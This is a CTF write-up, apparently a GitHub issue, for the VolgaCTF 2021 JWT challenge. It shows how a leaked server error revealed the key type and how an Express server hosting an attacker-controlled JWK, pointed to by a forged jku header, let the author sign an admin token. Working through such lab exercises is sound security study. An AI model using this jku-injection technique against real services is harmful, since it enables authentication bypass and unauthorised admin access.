
VolgaCTF 2021 Qualifier - JWT

aszx87410 opened this issue · comments


JWT

Description

[Screenshot of the challenge description, 2021-03-28 11:38:56 PM]

Writeup

After registering and logging in we get a JWT, and we need to be admin to get the flag.

This is what the JWT looks like:

[Screenshot of the decoded JWT, 2021-03-28 11:40:40 PM]

At first, I found that I could replace the jku with my own server, so I implemented a simple server to return the key. Unfortunately, it kept returning an error saying that it could not find a suitable key. I was stuck here for a long time and had no idea how to proceed.

Then I noticed a very important part of the error message: part of the JWK is included in the response. So I tried changing the JWT kid to another random string; here is the error message from the server:

JWT processing failed. Additional details: [[17] Unable to process JOSE object (cause: org.jose4j.lang.UnresolvableKeyException: Unable to find a suitable verification key for JWS w/ header {"kid":"HS2561","alg":"HS256"} from JWKs [org.jose4j.jwk.OctetSequenceJsonWebKey{kty=oct, kid=HS256, alg=HS256}] obtained from http://localhost:8080/secret): JsonWebSignature{"kid":"HS2561","alg":"HS256"}->eyJraWQiOiJIUzI1NjEiLCJhbGciOiJIUzI1NiJ9.eyJqa3UiOiJodHRwOi8vbG9jYWxob3N0OjgwODAvc2VjcmV0IiwiZXhwIjoxNjE3NTMwOTkyLCJqdGkiOiJCREFjSTZ1V0p5X0tvdmhTWnN6WW5nIiwiaWF0IjoxNjE2OTI2MTkyLCJuYmYiOjE2MTY5MjYwNzIsInN1YiI6ImV3ZWlvZmpld29pZiJ9.G_4j1QH9RoiSkv59rmZz0gtNFKPath-Bi8J4_dQmevo]

Great! Now we know the kty is oct, no wonder kty=RSA kept throwing an error.

Now that we know the correct kty, we can create our own JWK server:

```js
const express = require('express')
const app = express()

// Serve a single symmetric (kty=oct) JWK whose kid/alg match what the
// server's error message revealed: kid=HS256, alg=HS256.
app.get('/', (req, res) => {
  res.json({
    "kty": "oct",
    "kid": "HS256",
    "alg": "HS256",
    // base64url-encoded HMAC secret we control
    "k": "AyM1SysPpbyDfgZld3umj1qzKObwVMkoqQ-EstJQLr_T-1qS0gZH75aKtMN3Yj0iPS4hcgUuTwjAzZr1Z9CAow"
  })
})

app.listen(3000)
```

We can then sign a new JWT with sub=admin using this secret key, and get the flag.

References:

  1. https://blog.pentesteracademy.com/hacking-jwt-tokens-jku-claim-misuse-2e732109ac1c
  2. https://tools.ietf.org/html/rfc7517#appendix-A.3